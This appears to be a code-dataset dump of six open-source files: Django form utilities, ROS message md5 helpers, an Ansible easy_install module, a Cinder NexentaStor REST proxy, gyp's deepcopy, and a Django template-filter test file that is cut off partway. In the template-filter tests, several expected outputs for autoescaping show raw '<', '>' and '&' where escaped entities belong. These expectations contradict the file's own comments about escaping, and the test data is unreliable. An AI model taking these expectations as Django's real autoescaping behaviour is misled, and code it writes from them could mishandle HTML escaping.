repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
freeflightsim/fg-flying-club | google_appengine/lib/django/django/newforms/util.py | 32 | 2624 | from django.conf import settings
from django.utils.html import escape
def flatatt(attrs):
    """Convert a dictionary to a single string with key="value" pairs,
    XML-style, with a leading space.

    Assumes keys do not need to be XML-escaped; values are run through
    escape(). (Was a lambda assignment, which PEP 8 discourages; a def
    also gives the function a real name in tracebacks.)
    """
    return u''.join([u' %s="%s"' % (k, escape(v)) for k, v in attrs.items()])
def smart_unicode(s):
    """Coerce *s* to a unicode string, decoding bytestrings with
    settings.DEFAULT_CHARSET and falling back to __unicode__/str()
    for arbitrary objects. (Python 2 idiom: unicode/basestring.)
    """
    if isinstance(s, unicode):
        # Already unicode: nothing to do.
        return s
    if isinstance(s, basestring):
        # Plain bytestring: decode with the configured charset.
        return unicode(s, settings.DEFAULT_CHARSET)
    if hasattr(s, '__unicode__'):
        # Object knows how to render itself as unicode.
        return unicode(s)
    # Last resort: stringify, then decode.
    return unicode(str(s), settings.DEFAULT_CHARSET)
class StrAndUnicode(object):
    """
    A class whose __str__ returns its __unicode__ as a bytestring
    according to settings.DEFAULT_CHARSET.
    Useful as a mix-in.
    """
    def __str__(self):
        # Subclasses are expected to define __unicode__ (Python 2 idiom);
        # encode its result to bytes using the configured charset.
        return self.__unicode__().encode(settings.DEFAULT_CHARSET)
class ErrorDict(dict):
    """
    A collection of errors that knows how to display itself in various formats.
    The dictionary keys are the field names, and the values are the errors.
    """
    def __str__(self):
        # The HTML list rendering is the default string form.
        return self.as_ul()

    def as_ul(self):
        """Render the errors as an HTML unordered list."""
        if not self:
            return u''
        items = u''.join(u'<li>%s%s</li>' % pair for pair in self.items())
        return u'<ul class="errorlist">%s</ul>' % items

    def as_text(self):
        """Render the errors as plain-text bullet points, one field per block."""
        blocks = []
        for field, errors in self.items():
            bullets = u'\n'.join(u' * %s' % item for item in errors)
            blocks.append(u'* %s\n%s' % (field, bullets))
        return u'\n'.join(blocks)
class ErrorList(list):
    """
    A collection of errors that knows how to display itself in various formats.
    """
    def __str__(self):
        # The HTML list rendering is the default string form.
        return self.as_ul()

    def as_ul(self):
        """Render the errors as an HTML unordered list."""
        if not self:
            return u''
        items = [u'<li>%s</li>' % error for error in self]
        return u'<ul class="errorlist">%s</ul>' % u''.join(items)

    def as_text(self):
        """Render the errors as plain-text bullet points."""
        if not self:
            return u''
        return u'\n'.join(u'* %s' % error for error in self)
class ValidationError(Exception):
    """Raised when form/field validation fails.

    ``self.messages`` always ends up an ErrorList of unicode strings,
    whether the constructor was given a single string or a list of them.
    """
    def __init__(self, message):
        "ValidationError can be passed a string or a list."
        if isinstance(message, list):
            self.messages = ErrorList([smart_unicode(msg) for msg in message])
        else:
            # basestring is Python 2 only (this is py2-era code); anything
            # that is not a list must be a (byte- or unicode-) string.
            assert isinstance(message, basestring), ("%s should be a basestring" % repr(message))
            message = smart_unicode(message)
            self.messages = ErrorList([message])

    def __str__(self):
        # This is needed because, without a __str__(), printing an exception
        # instance would result in this:
        # AttributeError: ValidationError instance has no attribute 'args'
        # See http://www.python.org/doc/current/tut/node10.html#handling
        return repr(self.messages)
| gpl-2.0 |
umbraclet16/ardupilot | mk/VRBRAIN/Tools/genmsg/src/genmsg/gentools.py | 51 | 6819 | #! /usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Library for supporting message and service generation for all ROS
client libraries. This is mainly responsible for calculating the
md5sums and message definitions of classes.
"""
# NOTE: this should not contain any rospy-specific code. The rospy
# generator library is rospy.genpy.
import sys
import hashlib
try:
from cStringIO import StringIO # Python 2.x
except ImportError:
from io import StringIO # Python 3.x
from . import msgs
from .msgs import InvalidMsgSpec, MsgSpec, bare_msg_type, is_builtin
from .msg_loader import load_depends
from .srvs import SrvSpec
from . import names
from . import base
def compute_md5_text(msg_context, spec):
    """
    Compute the text used for md5 calculation. MD5 spec states that we
    removes comments and non-meaningful whitespace. We also strip
    packages names from type names. For convenience sake, constants are
    reordered ahead of other declarations, in the order that they were
    originally defined.

    NOTE: the exact bytes emitted here ARE the ROS md5 wire format —
    any change to the strings written below changes every message md5.

    :param msg_context: :class:`MsgContext` used to resolve registered subtypes.
    :param spec: :class:`MsgSpec` to serialize.
    :returns: text for ROS MD5-processing, ``str``
    """
    package = spec.package
    buff = StringIO()
    # Constants first, in original declaration order (see docstring).
    for c in spec.constants:
        buff.write("%s %s=%s\n"%(c.type, c.name, c.val_text))
    # Then one line per field, pairing declared types with field names.
    for type_, name in zip(spec.types, spec.names):
        msg_type = bare_msg_type(type_)
        # md5 spec strips package names
        if is_builtin(msg_type):
            buff.write("%s %s\n"%(type_, name))
        else:
            # recursively generate md5 for subtype. have to build up
            # dependency representation for subtype in order to
            # generate md5
            # NOTE(review): sub_pkg is computed but never used below —
            # looks like dead code kept for historical reasons; confirm.
            sub_pkg, _ = names.package_resource_name(msg_type)
            sub_pkg = sub_pkg or package
            sub_spec = msg_context.get_registered(msg_type)
            sub_md5 = compute_md5(msg_context, sub_spec)
            buff.write("%s %s\n"%(sub_md5, name))
    return buff.getvalue().strip() # remove trailing new line
def _compute_hash(msg_context, spec, hash):
    """
    subroutine of compute_md5()

    :param msg_context: :class:`MsgContext` instance to load dependencies into/from.
    :param spec: :class:`MsgSpec` to compute hash for.
    :param hash: hash instance
    """
    # Collect the md5 text fragments to feed to the hash: one for a plain
    # message, request + response halves for a service.
    if isinstance(spec, MsgSpec):
        fragments = [compute_md5_text(msg_context, spec)]
    elif isinstance(spec, SrvSpec):
        fragments = [compute_md5_text(msg_context, spec.request),
                     compute_md5_text(msg_context, spec.response)]
    else:
        raise Exception("[%s] is not a message or service"%spec)
    for fragment in fragments:
        hash.update(fragment.encode())
    return hash.hexdigest()
def compute_md5(msg_context, spec):
    """
    Compute md5 hash for message/service

    :param msg_context: :class:`MsgContext` instance to load dependencies into/from.
    :param spec: :class:`MsgSpec` to compute md5 for.
    :returns: md5 hash, ``str``
    """
    return _compute_hash(msg_context, spec, hashlib.md5())

## alias
# NOTE(review): presumably kept so older callers importing compute_md5_v2
# keep working — confirm before removing.
compute_md5_v2 = compute_md5
def _unique_deps(dep_list):
uniques = []
for d in dep_list:
if d not in uniques:
uniques.append(d)
return uniques
def compute_full_text(msg_context, spec):
    """
    Compute full text of message/service, including text of embedded
    types. The text of the main msg/srv is listed first. Embedded
    msg/srv files are denoted first by an 80-character '=' separator,
    followed by a type declaration line,'MSG: pkg/type', followed by
    the text of the embedded type.

    :param msg_context: :class:`MsgContext` instance to load dependencies into/from.
    :param spec: :class:`MsgSpec` to compute full text for.
    :returns: concatenated text for msg/srv file and embedded msg/srv types, ``str``
    """
    separator = '='*80+'\n'
    # Top-level type first, then each unique dependency in order.
    # Can't use set() for deduping as order must be preserved.
    pieces = [spec.text, '\n']
    for dep in _unique_deps(msg_context.get_all_depends(spec.full_name)):
        pieces.append(separator)
        pieces.append("MSG: %s\n" % dep)
        pieces.append(msg_context.get_registered(dep).text)
        pieces.append('\n')
    # #1168: remove the trailing \n separator added by the concatenation above
    return ''.join(pieces)[:-1]
def compute_full_type_name(package_name, file_name):
    """
    Compute the full type name of message/service 'pkg/type'.

    :param package_name: name of package file is in, ``str``
    :param file_name: name of the msg or srv file, ``str``
    :returns: typename in format 'pkg/type'
    :raises: :exc:`MsgGenerationException` if file_name ends with an unknown file extension
    """
    # Strip the recognized extension and qualify with the package name.
    for extension in (base.EXT_MSG, base.EXT_SRV):
        if file_name.endswith(extension):
            return "%s/%s" % (package_name, file_name[:-len(extension)])
    raise base.MsgGenerationException("Processing file: '%s' - unknown file extension" % (file_name))
| gpl-3.0 |
ssssam/ansible-modules-core | packaging/language/easy_install.py | 73 | 6261 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Matt Wright <matt@nobien.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
import tempfile
import os.path
DOCUMENTATION = '''
---
module: easy_install
short_description: Installs Python libraries
description:
- Installs Python libraries, optionally in a I(virtualenv)
version_added: "0.7"
options:
name:
description:
- A Python library name
required: true
default: null
aliases: []
virtualenv:
description:
- an optional I(virtualenv) directory path to install into. If the
I(virtualenv) does not exist, it is created automatically
required: false
default: null
virtualenv_site_packages:
version_added: "1.1"
description:
- Whether the virtual environment will inherit packages from the
global site-packages directory. Note that if this setting is
changed on an already existing virtual environment it will not
have any effect, the environment must be deleted and newly
created.
required: false
default: "no"
choices: [ "yes", "no" ]
virtualenv_command:
version_added: "1.1"
description:
- The command to create the virtual environment with. For example
C(pyvenv), C(virtualenv), C(virtualenv2).
required: false
default: virtualenv
executable:
description:
- The explicit executable or a pathname to the executable to be used to
run easy_install for a specific version of Python installed in the
system. For example C(easy_install-3.3), if there are both Python 2.7
and 3.3 installations in the system and you want to run easy_install
for the Python 3.3 installation.
version_added: "1.3"
required: false
default: null
notes:
- Please note that the M(easy_install) module can only install Python
libraries. Thus this module is not able to remove libraries. It is
generally recommended to use the M(pip) module which you can first install
using M(easy_install).
- Also note that I(virtualenv) must be installed on the remote host if the
C(virtualenv) parameter is specified.
requirements: [ "virtualenv" ]
author: Matt Wright
'''
EXAMPLES = '''
# Examples from Ansible Playbooks
- easy_install: name=pip
# Install Bottle into the specified virtualenv.
- easy_install: name=bottle virtualenv=/webapps/myapp/venv
'''
def _is_package_installed(module, name, easy_install):
cmd = '%s --dry-run %s' % (easy_install, name)
rc, status_stdout, status_stderr = module.run_command(cmd)
return not ('Reading' in status_stdout or 'Downloading' in status_stdout)
def _get_easy_install(module, env=None, executable=None):
candidate_easy_inst_basenames = ['easy_install']
easy_install = None
if executable is not None:
if os.path.isabs(executable):
easy_install = executable
else:
candidate_easy_inst_basenames.insert(0, executable)
if easy_install is None:
if env is None:
opt_dirs = []
else:
# Try easy_install with the virtualenv directory first.
opt_dirs = ['%s/bin' % env]
for basename in candidate_easy_inst_basenames:
easy_install = module.get_bin_path(basename, False, opt_dirs)
if easy_install is not None:
break
# easy_install should have been found by now. The final call to
# get_bin_path will trigger fail_json.
if easy_install is None:
basename = candidate_easy_inst_basenames[0]
easy_install = module.get_bin_path(basename, True, opt_dirs)
return easy_install
def main():
    """Module entry point: ensure a Python library is installed via
    easy_install, optionally inside a virtualenv (created on demand).

    NOTE(review): control flow relies on AnsibleModule.exit_json() /
    fail_json() not returning (they terminate the process) — standard
    Ansible behavior, but not visible from this file.
    """
    arg_spec = dict(
        name=dict(required=True),
        virtualenv=dict(default=None, required=False),
        virtualenv_site_packages=dict(default='no', type='bool'),
        virtualenv_command=dict(default='virtualenv', required=False),
        executable=dict(default='easy_install', required=False),
    )

    module = AnsibleModule(argument_spec=arg_spec, supports_check_mode=True)

    name = module.params['name']
    env = module.params['virtualenv']
    executable = module.params['executable']
    site_packages = module.params['virtualenv_site_packages']
    virtualenv_command = module.params['virtualenv_command']

    # Accumulated results of the (up to) two commands we may run.
    rc = 0
    err = ''
    out = ''

    if env:
        virtualenv = module.get_bin_path(virtualenv_command, True)

        # Create the virtualenv only if it does not already exist
        # (detected by the presence of bin/activate).
        if not os.path.exists(os.path.join(env, 'bin', 'activate')):
            if module.check_mode:
                module.exit_json(changed=True)
            command = '%s %s' % (virtualenv, env)
            if site_packages:
                command += ' --system-site-packages'
            # Run from a neutral cwd in case the current one is unreadable.
            cwd = tempfile.gettempdir()
            rc_venv, out_venv, err_venv = module.run_command(command, cwd=cwd)

            rc += rc_venv
            out += out_venv
            err += err_venv

    easy_install = _get_easy_install(module, env, executable)

    cmd = None
    changed = False
    installed = _is_package_installed(module, name, easy_install)

    if not installed:
        if module.check_mode:
            module.exit_json(changed=True)
        cmd = '%s %s' % (easy_install, name)
        rc_easy_inst, out_easy_inst, err_easy_inst = module.run_command(cmd)

        rc += rc_easy_inst
        out += out_easy_inst
        err += err_easy_inst

        changed = True

    # Any non-zero rc from either step is treated as failure.
    if rc != 0:
        module.fail_json(msg=err, cmd=cmd)

    module.exit_json(changed=changed, binary=easy_install,
                     name=name, virtualenv=env)
# import module snippets
# NOTE: pre-Ansible-2.0 convention — this wildcard import injects
# AnsibleModule and helpers, and must come after the definitions above.
from ansible.module_utils.basic import *

main()
| gpl-3.0 |
NetApp/cinder | cinder/volume/drivers/nexenta/ns5/jsonrpc.py | 5 | 3097 | # Copyright 2011 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import json
import time
from oslo_log import log as logging
from oslo_serialization import jsonutils
import requests
from cinder import exception
LOG = logging.getLogger(__name__)
class NexentaJSONProxy(object):
    """Callable proxy for the NexentaStor 5 REST (NEF) API.

    Attribute access returns a clone of the proxy bound to an HTTP verb,
    so ``proxy.get(path)`` issues ``GET <url><path>``.  Calling the proxy
    sends the request, transparently polling async (202) jobs to
    completion, and returns the decoded JSON body or the string
    'Success'.
    """

    def __init__(self, scheme, host, port, user,
                 password, auto=False, method=None):
        self.scheme = scheme
        self.host = host
        self.port = port
        self.user = user
        self.password = password
        # Bug fix: this used to be hard-coded ``self.auto = True``,
        # silently discarding the caller-supplied value.
        self.auto = auto
        self.method = method

    @property
    def url(self):
        """Base URL of the NEF endpoint, with trailing slash."""
        return '%s://%s:%s/' % (self.scheme, self.host, self.port)

    def __getattr__(self, method=None):
        # ``proxy.post`` etc. yields a new proxy whose __call__ uses that
        # HTTP verb.  (Returns None for a falsy name, as before.)
        if method:
            return NexentaJSONProxy(
                self.scheme, self.host, self.port,
                self.user, self.password, self.auto, method)

    def __hash__(self):
        return self.url.__hash__()

    def __repr__(self):
        return 'NEF proxy: %s' % self.url

    def __call__(self, path, data=None):
        """Issue the bound HTTP method against *path*.

        :param path: URL path relative to the endpoint
        :param data: optional payload, JSON-encoded before sending
        :raises: exception.NexentaException when the response carries a 'code'
        """
        # HTTP Basic credentials.  Bug fix: the former ``[:-1]`` slice (a
        # leftover from base64.encodestring's trailing newline) chopped the
        # final character off the token, corrupting the header —
        # b64encode() adds no newline.  Decode so the header is text.
        auth = base64.b64encode(
            ('%s:%s' % (self.user, self.password)).encode('utf-8')).decode('utf-8')
        headers = {
            'Content-Type': 'application/json',
            'Authorization': 'Basic %s' % auth
        }
        url = self.url + path
        if data:
            data = jsonutils.dumps(data)
        LOG.debug('Sending JSON to url: %s, data: %s, method: %s',
                  path, data, self.method)
        resp = getattr(requests, self.method)(url, data=data, headers=headers)
        if resp.status_code == 201 or (
                resp.status_code == 200 and not resp.content):
            LOG.debug('Got response: Success')
            return 'Success'
        response = json.loads(resp.content)
        resp.close()
        if response and resp.status_code == 202:
            # 202 Accepted: poll the async job link until it finishes.
            url = self.url + response['links'][0]['href']
            while resp.status_code == 202:
                time.sleep(1)
                resp = requests.get(url)
                if resp.status_code == 201 or (
                        resp.status_code == 200 and not resp.content):
                    LOG.debug('Got response: Success')
                    return 'Success'
                else:
                    response = json.loads(resp.content)
                    resp.close()
        if response.get('code'):
            raise exception.NexentaException(response)
        LOG.debug('Got response: %s', response)
        return response
| apache-2.0 |
svn2github/gyp | pylib/gyp/simple_copy.py | 1869 | 1247 | # Copyright 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A clone of the default copy.deepcopy that doesn't handle cyclic
structures or complex types except for dicts and lists. This is
because gyp copies so large structure that small copy overhead ends up
taking seconds in a project the size of Chromium."""
class Error(Exception):
  """Raised when deepcopy() encounters a type it does not support."""
  pass

# Public API of this module.
__all__ = ["Error", "deepcopy"]
def deepcopy(x):
  """Deep copy operation on gyp objects such as strings, ints, dicts
  and lists. More than twice as fast as copy.deepcopy but much less
  generic.

  Raises Error for types without a registered copier.
  """
  try:
    return _deepcopy_dispatch[type(x)](x)
  except KeyError:
    # Implicit string concatenation (no '+') so '%' formats the whole
    # message.  With the previous '+', '%' bound only to the second
    # fragment (which has no placeholder), raising TypeError instead of
    # the intended Error.
    raise Error('Unsupported type %s for deepcopy. Use copy.deepcopy '
                'or expand simple_copy support.' % type(x))
# Dispatch table mapping type -> copier function.  'd' is a short alias
# used only while the table is built (deleted at the bottom of the module).
_deepcopy_dispatch = d = {}

def _deepcopy_atomic(x):
  # Immutable values are shared, not copied.
  return x

# NOTE: 'long' and 'unicode' exist on Python 2 only; this module predates
# Python 3 support.
for x in (type(None), int, long, float,
          bool, str, unicode, type):
  d[x] = _deepcopy_atomic
def _deepcopy_list(x):
  """Return a new list with every element deep-copied."""
  return list(map(deepcopy, x))

d[list] = _deepcopy_list
def _deepcopy_dict(x):
  """Return a new dict with both keys and values deep-copied."""
  y = {}
  # iteritems() is Python 2 only; this module predates Python 3 support.
  for key, value in x.iteritems():
    y[deepcopy(key)] = deepcopy(value)
  return y
d[dict] = _deepcopy_dict

# Drop the temporary alias so it does not leak from the module namespace.
del d
| bsd-3-clause |
bliti/django-nonrel-1.5 | tests/regressiontests/templates/filters.py | 52 | 30861 | # coding: utf-8
"""
Tests for template filters (as opposed to template tags).
The tests are hidden inside a function so that things like timestamps and
timezones are only evaluated at the moment of execution and will therefore be
consistent.
"""
from __future__ import unicode_literals
from datetime import date, datetime, time, timedelta
from django.test.utils import str_prefix
from django.utils.tzinfo import LocalTimezone, FixedOffset
from django.utils.safestring import mark_safe
from django.utils.encoding import python_2_unicode_compatible
# These two classes are used to test auto-escaping of __unicode__ output.
@python_2_unicode_compatible
class UnsafeClass:
    """String output is NOT marked safe, so template autoescaping is
    expected to escape the '&' in the rendered result."""
    def __str__(self):
        return 'you & me'
@python_2_unicode_compatible
class SafeClass:
    """String output is wrapped in mark_safe, so template autoescaping
    is expected to leave it untouched."""
    def __str__(self):
        return mark_safe('you > me')
# RESULT SYNTAX --
# 'template_name': ('template contents', 'context dict',
# 'expected string output' or Exception class)
def get_filter_tests():
now = datetime.now()
now_tz = datetime.now(LocalTimezone(now))
now_tz_i = datetime.now(FixedOffset((3 * 60) + 15)) # imaginary time zone
today = date.today()
return {
# Default compare with datetime.now()
'filter-timesince01' : ('{{ a|timesince }}', {'a': datetime.now() + timedelta(minutes=-1, seconds = -10)}, '1 minute'),
'filter-timesince02' : ('{{ a|timesince }}', {'a': datetime.now() - timedelta(days=1, minutes = 1)}, '1 day'),
'filter-timesince03' : ('{{ a|timesince }}', {'a': datetime.now() - timedelta(hours=1, minutes=25, seconds = 10)}, '1 hour, 25 minutes'),
# Compare to a given parameter
'filter-timesince04' : ('{{ a|timesince:b }}', {'a':now - timedelta(days=2), 'b':now - timedelta(days=1)}, '1 day'),
'filter-timesince05' : ('{{ a|timesince:b }}', {'a':now - timedelta(days=2, minutes=1), 'b':now - timedelta(days=2)}, '1 minute'),
# Check that timezone is respected
'filter-timesince06' : ('{{ a|timesince:b }}', {'a':now_tz - timedelta(hours=8), 'b':now_tz}, '8 hours'),
# Regression for #7443
'filter-timesince07': ('{{ earlier|timesince }}', { 'earlier': now - timedelta(days=7) }, '1 week'),
'filter-timesince08': ('{{ earlier|timesince:now }}', { 'now': now, 'earlier': now - timedelta(days=7) }, '1 week'),
'filter-timesince09': ('{{ later|timesince }}', { 'later': now + timedelta(days=7) }, '0 minutes'),
'filter-timesince10': ('{{ later|timesince:now }}', { 'now': now, 'later': now + timedelta(days=7) }, '0 minutes'),
# Ensures that differing timezones are calculated correctly
'filter-timesince11' : ('{{ a|timesince }}', {'a': now}, '0 minutes'),
'filter-timesince12' : ('{{ a|timesince }}', {'a': now_tz}, '0 minutes'),
'filter-timesince13' : ('{{ a|timesince }}', {'a': now_tz_i}, '0 minutes'),
'filter-timesince14' : ('{{ a|timesince:b }}', {'a': now_tz, 'b': now_tz_i}, '0 minutes'),
'filter-timesince15' : ('{{ a|timesince:b }}', {'a': now, 'b': now_tz_i}, ''),
'filter-timesince16' : ('{{ a|timesince:b }}', {'a': now_tz_i, 'b': now}, ''),
# Regression for #9065 (two date objects).
'filter-timesince17' : ('{{ a|timesince:b }}', {'a': today, 'b': today}, '0 minutes'),
'filter-timesince18' : ('{{ a|timesince:b }}', {'a': today, 'b': today + timedelta(hours=24)}, '1 day'),
# Default compare with datetime.now()
'filter-timeuntil01' : ('{{ a|timeuntil }}', {'a':datetime.now() + timedelta(minutes=2, seconds = 10)}, '2 minutes'),
'filter-timeuntil02' : ('{{ a|timeuntil }}', {'a':(datetime.now() + timedelta(days=1, seconds = 10))}, '1 day'),
'filter-timeuntil03' : ('{{ a|timeuntil }}', {'a':(datetime.now() + timedelta(hours=8, minutes=10, seconds = 10))}, '8 hours, 10 minutes'),
# Compare to a given parameter
'filter-timeuntil04' : ('{{ a|timeuntil:b }}', {'a':now - timedelta(days=1), 'b':now - timedelta(days=2)}, '1 day'),
'filter-timeuntil05' : ('{{ a|timeuntil:b }}', {'a':now - timedelta(days=2), 'b':now - timedelta(days=2, minutes=1)}, '1 minute'),
# Regression for #7443
'filter-timeuntil06': ('{{ earlier|timeuntil }}', { 'earlier': now - timedelta(days=7) }, '0 minutes'),
'filter-timeuntil07': ('{{ earlier|timeuntil:now }}', { 'now': now, 'earlier': now - timedelta(days=7) }, '0 minutes'),
'filter-timeuntil08': ('{{ later|timeuntil }}', { 'later': now + timedelta(days=7, hours=1) }, '1 week'),
'filter-timeuntil09': ('{{ later|timeuntil:now }}', { 'now': now, 'later': now + timedelta(days=7) }, '1 week'),
# Ensures that differing timezones are calculated correctly
'filter-timeuntil10' : ('{{ a|timeuntil }}', {'a': now_tz_i}, '0 minutes'),
'filter-timeuntil11' : ('{{ a|timeuntil:b }}', {'a': now_tz_i, 'b': now_tz}, '0 minutes'),
# Regression for #9065 (two date objects).
'filter-timeuntil12' : ('{{ a|timeuntil:b }}', {'a': today, 'b': today}, '0 minutes'),
'filter-timeuntil13' : ('{{ a|timeuntil:b }}', {'a': today, 'b': today - timedelta(hours=24)}, '1 day'),
'filter-addslash01': ("{% autoescape off %}{{ a|addslashes }} {{ b|addslashes }}{% endautoescape %}", {"a": "<a>'", "b": mark_safe("<a>'")}, r"<a>\' <a>\'"),
'filter-addslash02': ("{{ a|addslashes }} {{ b|addslashes }}", {"a": "<a>'", "b": mark_safe("<a>'")}, r"<a>\' <a>\'"),
'filter-capfirst01': ("{% autoescape off %}{{ a|capfirst }} {{ b|capfirst }}{% endautoescape %}", {"a": "fred>", "b": mark_safe("fred>")}, "Fred> Fred>"),
'filter-capfirst02': ("{{ a|capfirst }} {{ b|capfirst }}", {"a": "fred>", "b": mark_safe("fred>")}, "Fred> Fred>"),
# Note that applying fix_ampsersands in autoescape mode leads to
# double escaping.
'filter-fix_ampersands01': ("{% autoescape off %}{{ a|fix_ampersands }} {{ b|fix_ampersands }}{% endautoescape %}", {"a": "a&b", "b": mark_safe("a&b")}, "a&b a&b"),
'filter-fix_ampersands02': ("{{ a|fix_ampersands }} {{ b|fix_ampersands }}", {"a": "a&b", "b": mark_safe("a&b")}, "a&amp;b a&b"),
'filter-floatformat01': ("{% autoescape off %}{{ a|floatformat }} {{ b|floatformat }}{% endautoescape %}", {"a": "1.42", "b": mark_safe("1.42")}, "1.4 1.4"),
'filter-floatformat02': ("{{ a|floatformat }} {{ b|floatformat }}", {"a": "1.42", "b": mark_safe("1.42")}, "1.4 1.4"),
# The contents of "linenumbers" is escaped according to the current
# autoescape setting.
'filter-linenumbers01': ("{{ a|linenumbers }} {{ b|linenumbers }}", {"a": "one\n<two>\nthree", "b": mark_safe("one\n<two>\nthree")}, "1. one\n2. <two>\n3. three 1. one\n2. <two>\n3. three"),
'filter-linenumbers02': ("{% autoescape off %}{{ a|linenumbers }} {{ b|linenumbers }}{% endautoescape %}", {"a": "one\n<two>\nthree", "b": mark_safe("one\n<two>\nthree")}, "1. one\n2. <two>\n3. three 1. one\n2. <two>\n3. three"),
'filter-lower01': ("{% autoescape off %}{{ a|lower }} {{ b|lower }}{% endautoescape %}", {"a": "Apple & banana", "b": mark_safe("Apple & banana")}, "apple & banana apple & banana"),
'filter-lower02': ("{{ a|lower }} {{ b|lower }}", {"a": "Apple & banana", "b": mark_safe("Apple & banana")}, "apple & banana apple & banana"),
# The make_list filter can destroy existing escaping, so the results are
# escaped.
'filter-make_list01': ("{% autoescape off %}{{ a|make_list }}{% endautoescape %}", {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
'filter-make_list02': ("{{ a|make_list }}", {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
'filter-make_list03': ('{% autoescape off %}{{ a|make_list|stringformat:"s"|safe }}{% endautoescape %}', {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
'filter-make_list04': ('{{ a|make_list|stringformat:"s"|safe }}', {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
# Running slugify on a pre-escaped string leads to odd behavior,
# but the result is still safe.
'filter-slugify01': ("{% autoescape off %}{{ a|slugify }} {{ b|slugify }}{% endautoescape %}", {"a": "a & b", "b": mark_safe("a & b")}, "a-b a-amp-b"),
'filter-slugify02': ("{{ a|slugify }} {{ b|slugify }}", {"a": "a & b", "b": mark_safe("a & b")}, "a-b a-amp-b"),
# Notice that escaping is applied *after* any filters, so the string
# formatting here only needs to deal with pre-escaped characters.
'filter-stringformat01': ('{% autoescape off %}.{{ a|stringformat:"5s" }}. .{{ b|stringformat:"5s" }}.{% endautoescape %}',
{"a": "a<b", "b": mark_safe("a<b")}, ". a<b. . a<b."),
'filter-stringformat02': ('.{{ a|stringformat:"5s" }}. .{{ b|stringformat:"5s" }}.', {"a": "a<b", "b": mark_safe("a<b")},
". a<b. . a<b."),
# Test the title filter
'filter-title1' : ('{{ a|title }}', {'a' : 'JOE\'S CRAB SHACK'}, 'Joe's Crab Shack'),
'filter-title2' : ('{{ a|title }}', {'a' : '555 WEST 53RD STREET'}, '555 West 53rd Street'),
'filter-truncatewords01': ('{% autoescape off %}{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}{% endautoescape %}',
{"a": "alpha & bravo", "b": mark_safe("alpha & bravo")}, "alpha & ... alpha & ..."),
'filter-truncatewords02': ('{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}',
{"a": "alpha & bravo", "b": mark_safe("alpha & bravo")}, "alpha & ... alpha & ..."),
'filter-truncatechars01': ('{{ a|truncatechars:5 }}', {'a': "Testing, testing"}, "Te..."),
'filter-truncatechars02': ('{{ a|truncatechars:7 }}', {'a': "Testing"}, "Testing"),
# The "upper" filter messes up entities (which are case-sensitive),
# so it's not safe for non-escaping purposes.
'filter-upper01': ('{% autoescape off %}{{ a|upper }} {{ b|upper }}{% endautoescape %}', {"a": "a & b", "b": mark_safe("a & b")}, "A & B A & B"),
'filter-upper02': ('{{ a|upper }} {{ b|upper }}', {"a": "a & b", "b": mark_safe("a & b")}, "A & B A &AMP; B"),
'filter-urlize01': ('{% autoescape off %}{{ a|urlize }} {{ b|urlize }}{% endautoescape %}', {"a": "http://example.com/?x=&y=", "b": mark_safe("http://example.com?x=&y=")}, '<a href="http://example.com/?x=&y=" rel="nofollow">http://example.com/?x=&y=</a> <a href="http://example.com?x=&y=" rel="nofollow">http://example.com?x=&y=</a>'),
'filter-urlize02': ('{{ a|urlize }} {{ b|urlize }}', {"a": "http://example.com/?x=&y=", "b": mark_safe("http://example.com?x=&y=")}, '<a href="http://example.com/?x=&y=" rel="nofollow">http://example.com/?x=&y=</a> <a href="http://example.com?x=&y=" rel="nofollow">http://example.com?x=&y=</a>'),
